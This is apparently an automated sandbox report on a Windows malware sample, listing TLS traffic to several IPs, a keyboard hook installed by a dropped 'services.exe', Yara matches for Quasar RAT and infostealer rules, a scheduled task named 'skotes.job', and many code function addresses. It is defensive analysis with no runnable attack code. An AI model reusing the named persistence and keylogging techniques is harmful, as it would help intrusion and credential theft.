Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: random.exe, 00000000.00000003.1739862651.0000000005B1C000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50085 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Windows user hook set: 7236 call wnd proc C:\Windows\System32\shcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir\services.exe

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services.exe PID: 7272, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name:
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: .idata
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name:
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name:
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: .idata
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name:
Source: spoDnGT[1].exe.11.dr	Static PE information: section name:
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: .idata
Source: spoDnGT[1].exe.11.dr	Static PE information: section name:
Source: spoDnGT.exe.11.dr	Static PE information: section name:
Source: spoDnGT.exe.11.dr	Static PE information: section name: .idata
Source: spoDnGT.exe.11.dr	Static PE information: section name:
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name:
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: .idata
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name:
Source: kzTq7Bt.exe.11.dr	Static PE information: section name:
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: .idata
Source: kzTq7Bt.exe.11.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C5D62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

1_2_6C5D62C0

Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe

File deleted: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C45AC60	1_2_6C45AC60
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C516C00	1_2_6C516C00
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52AC30	1_2_6C52AC30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C44ECC0	1_2_6C44ECC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4AECD0	1_2_6C4AECD0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C57AD50	1_2_6C57AD50
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C51ED70	1_2_6C51ED70
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D8D20	1_2_6C5D8D20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5DCDC0	1_2_6C5DCDC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E6D90	1_2_6C4E6D90
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C454DB0	1_2_6C454DB0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4EEE70	1_2_6C4EEE70
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C530E20	1_2_6C530E20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C45AEC0	1_2_6C45AEC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4F0EC0	1_2_6C4F0EC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4D6E90	1_2_6C4D6E90
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4BEF40	1_2_6C4BEF40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C512F70	1_2_6C512F70
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C456F10	1_2_6C456F10
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C590F20	1_2_6C590F20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52EFF0	1_2_6C52EFF0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C450FE0	1_2_6C450FE0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C598FB0	1_2_6C598FB0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C45EFB0	1_2_6C45EFB0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C524840	1_2_6C524840
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A0820	1_2_6C4A0820
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4DA820	1_2_6C4DA820
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5568E0	1_2_6C5568E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C488960	1_2_6C488960
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A6900	1_2_6C4A6900
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C56C9E0	1_2_6C56C9E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4849F0	1_2_6C4849F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5109B0	1_2_6C5109B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E09A0	1_2_6C4E09A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C50A9A0	1_2_6C50A9A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4CCA70	1_2_6C4CCA70
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4FEA00	1_2_6C4FEA00
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C508A30	1_2_6C508A30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4CEA80	1_2_6C4CEA80
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C556BE0	1_2_6C556BE0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4F0BA0	1_2_6C4F0BA0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C468460	1_2_6C468460
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B4420	1_2_6C4B4420
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4DA430	1_2_6C4DA430
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4964D0	1_2_6C4964D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4EA4D0	1_2_6C4EA4D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C57A480	1_2_6C57A480
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C598550	1_2_6C598550
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A8540	1_2_6C4A8540
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C554540	1_2_6C554540
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B2560	1_2_6C4B2560
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4F0570	1_2_6C4F0570
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C51A5E0	1_2_6C51A5E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4DE5F0	1_2_6C4DE5F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4445B0	1_2_6C4445B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4AC650	1_2_6C4AC650
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4746D0	1_2_6C4746D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4AE6E0	1_2_6C4AE6E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4EE6E0	1_2_6C4EE6E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4D0700	1_2_6C4D0700
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C47A7D0	1_2_6C47A7D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C49E070	1_2_6C49E070
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C518010	1_2_6C518010
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C51C000	1_2_6C51C000
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C448090	1_2_6C448090
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52C0B0	1_2_6C52C0B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4600B0	1_2_6C4600B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B8140	1_2_6C4B8140
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C534130	1_2_6C534130
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4C6130	1_2_6C4C6130
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4501E0	1_2_6C4501E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E8250	1_2_6C4E8250
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4D8260	1_2_6C4D8260
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C51A210	1_2_6C51A210
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C528220	1_2_6C528220
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D62C0	1_2_6C5D62C0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C51E2B0	1_2_6C51E2B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5222A0	1_2_6C5222A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C458340	1_2_6C458340
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C592370	1_2_6C592370
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C452370	1_2_6C452370
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C56C360	1_2_6C56C360
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E6370	1_2_6C4E6370
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4C2320	1_2_6C4C2320
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A43E0	1_2_6C4A43E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4823A0	1_2_6C4823A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4AE3B0	1_2_6C4AE3B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C453C40	1_2_6C453C40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C579C40	1_2_6C579C40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C461C30	1_2_6C461C30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C58DCD0	1_2_6C58DCD0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C511CE0	1_2_6C511CE0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B3D00	1_2_6C4B3D00
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C521DC0	1_2_6C521DC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C443D80	1_2_6C443D80
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C599D90	1_2_6C599D90
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5ABE70	1_2_6C5ABE70
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D5E60	1_2_6C5D5E60
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C55DE10	1_2_6C55DE10
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C473EC0	1_2_6C473EC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C485F20	1_2_6C485F20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C445F30	1_2_6C445F30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5A7F20	1_2_6C5A7F20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C56DFC0	1_2_6C56DFC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D3FC0	1_2_6C5D3FC0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4FBFF0	1_2_6C4FBFF0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C471F90	1_2_6C471F90
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4AD810	1_2_6C4AD810
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52F8F0	1_2_6C52F8F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C45D8E0	1_2_6C45D8E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4838E0	1_2_6C4838E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5AB8F0	1_2_6C5AB8F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4CF960	1_2_6C4CF960
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C50D960	1_2_6C50D960
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C59F900	1_2_6C59F900
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C505920	1_2_6C505920
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E99C0	1_2_6C4E99C0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4899D0	1_2_6C4899D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B59F0	1_2_6C4B59F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4E79F0	1_2_6C4E79F0
